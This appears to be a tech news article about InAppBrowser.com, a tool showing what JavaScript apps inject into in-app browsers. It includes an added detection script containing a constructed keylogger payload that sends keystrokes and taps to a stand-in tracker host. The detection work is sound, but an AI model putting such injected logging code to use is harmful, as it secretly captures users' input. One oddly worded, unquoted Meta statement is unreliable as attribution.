Photo: someone using the Facebook app on a phone. In-app browsers could give apps easy access to your private information.
Photo by Amelia Holowaty Krales / The Verge

Did you know that you can be tracked when an app opens a link in its own in-app browser on your phone? A new tool shows how apps like TikTok can inject JavaScript into the pages you visit there and potentially read sensitive data without your permission.

The tool lives at InAppBrowser.com. Open the app you want to check, share the InAppBrowser.com URL somewhere inside it, then tap that link from within the app. The page that loads in the app's in-app browser reports the JavaScript the app injected into it.

Felix Krause, the tool's developer, includes an FAQ explaining exactly what the report shows. When you open a link from within an app, check whether the app lets you open the site in your default browser instead; every app covered here had a way to do this.

Krause, a security researcher who formerly worked at Google, shared a report on how the browsers built into apps can be a privacy risk for users.

An in-app browser opens when you tap a URL inside an app. On iOS these browsers are built on Safari's WebKit, and the app's developers can make them run their own JavaScript inside the page that loads, which lets them track your activity on that page without your consent.

The injected JavaScript can watch how you interact with the page: every button or link you tap, what you type on the keyboard, and whether you take a picture.
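To make the injection concrete, here is an added example (it is not the InAppBrowser.com tool's code and not Krause's) of what an injected keystroke-and-tap logger can look like, alongside one way a page can look for such injections: scripts the page never shipped, and built-in functions that an app has wrapped. It runs under Node against a constructed stand-in for `document`; the `tracker.example` host, the `OWN_SCRIPTS` list and the keyword heuristics are assumptions for the demonstration.

```javascript
// Added example, not the InAppBrowser.com tool's own code: one way a web page
// can look for JavaScript that the host app injected into its in-app browser.
// It runs under Node against a constructed stand-in for `document`; in a real
// browser you would drop the stub and pass the real `document` instead.

const NATIVE_MARKER = "[native code]";

// Scripts the page itself ships (assumption: the page knows its own bundle
// and loads no inline scripts of its own).
const OWN_SCRIPTS = new Set(["https://example.com/static/app.js"]);

// Constructed payload of the kind an app could inject into its WebKit view:
// it forwards every keystroke and tap to a hypothetical collection host.
const INJECTED_PAYLOAD = `
document.addEventListener('keydown', e => fetch('https://tracker.example/k?c=' + e.key));
document.addEventListener('click', e => fetch('https://tracker.example/c?t=' + e.target.tagName));
`;

// Constructed stand-in for document.scripts after the injection above.
function makeConstructedDocument() {
  return {
    scripts: [
      { src: "https://example.com/static/app.js", textContent: "" },
      { src: "", textContent: INJECTED_PAYLOAD },
    ],
  };
}

// Simple keyword heuristics for what tracking scripts usually touch (assumption).
const SUSPICIOUS = [
  /keydown|keypress|keyup|input/,
  /addEventListener\(\s*['"]click['"]/,
  /\bfetch\(|XMLHttpRequest|sendBeacon/,
];

// Report every script the page did not ship itself, with the heuristics it trips.
function classifyScripts(doc, ownScripts) {
  const findings = [];
  for (const s of doc.scripts) {
    if (s.src) {
      if (!ownScripts.has(s.src)) findings.push({ kind: "external", src: s.src, hits: [] });
      continue;
    }
    const hits = SUSPICIOUS.filter((re) => re.test(s.textContent)).map((re) => re.source);
    findings.push({ kind: "inline", src: "", hits, snippet: s.textContent.trim().slice(0, 80) });
  }
  return findings;
}

// Built-ins stringify to "function name() { [native code] }"; a plain JavaScript
// wrapper that an app installed over them does not.
function findPatchedNatives(candidates) {
  return candidates
    .filter((c) => typeof c.fn === "function")
    .filter((c) => !Function.prototype.toString.call(c.fn).includes(NATIVE_MARKER))
    .map((c) => c.name);
}

// Constructed wrapper of the kind an app might install over a built-in so it
// can see every value the page passes through it.
const originalStringify = JSON.stringify;
const hookedStringify = function (...args) {
  // a real hook would exfiltrate `args` here
  return originalStringify(...args);
};

// Run both checks and return the combined report.
function auditPage(doc) {
  return {
    injectedScripts: classifyScripts(doc, OWN_SCRIPTS),
    patchedNatives: findPatchedNatives([
      { name: "JSON.stringify", fn: JSON.stringify }, // genuine built-in
      { name: "JSON.stringify (wrapped)", fn: hookedStringify },
    ]),
  };
}

console.log(JSON.stringify(auditPage(makeConstructedDocument()), null, 2));
```

Two blind spots are worth knowing: a wrapper made with `.bind()` or a `Proxy` stringifies as native code and slips past `findPatchedNatives`, and an app that scripts the web view from native code without adding any script element leaves nothing for `classifyScripts` to find, which is the same limit the article notes for the InAppBrowser.com tool.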

Meta defended its custom tracking script by saying that users already consent to the tracking of their data, and that the data is used only for targeted advertising.

The code was developed to honor the people who asked to be tracked on the platform. The code allows us to aggregate user data before we use it.

Meta also said that it asks users for consent before saving payment details:

“For purchases made through the in-app browser, we seek user consent to save payment information for the purposes of autofill.”

The tool is not perfect. Krause acknowledges that it cannot detect every JavaScript command an app executes, that it sees nothing of tracking the app performs in native code, and that injecting JavaScript also has legitimate uses in app development. It still gives users a way to check what their favorite apps do to the pages they open.

The tool and its analysis code are open source, so anyone can inspect how it checks what apps do inside their browsers, and the community can improve the script over time. Krause's website has more information about it.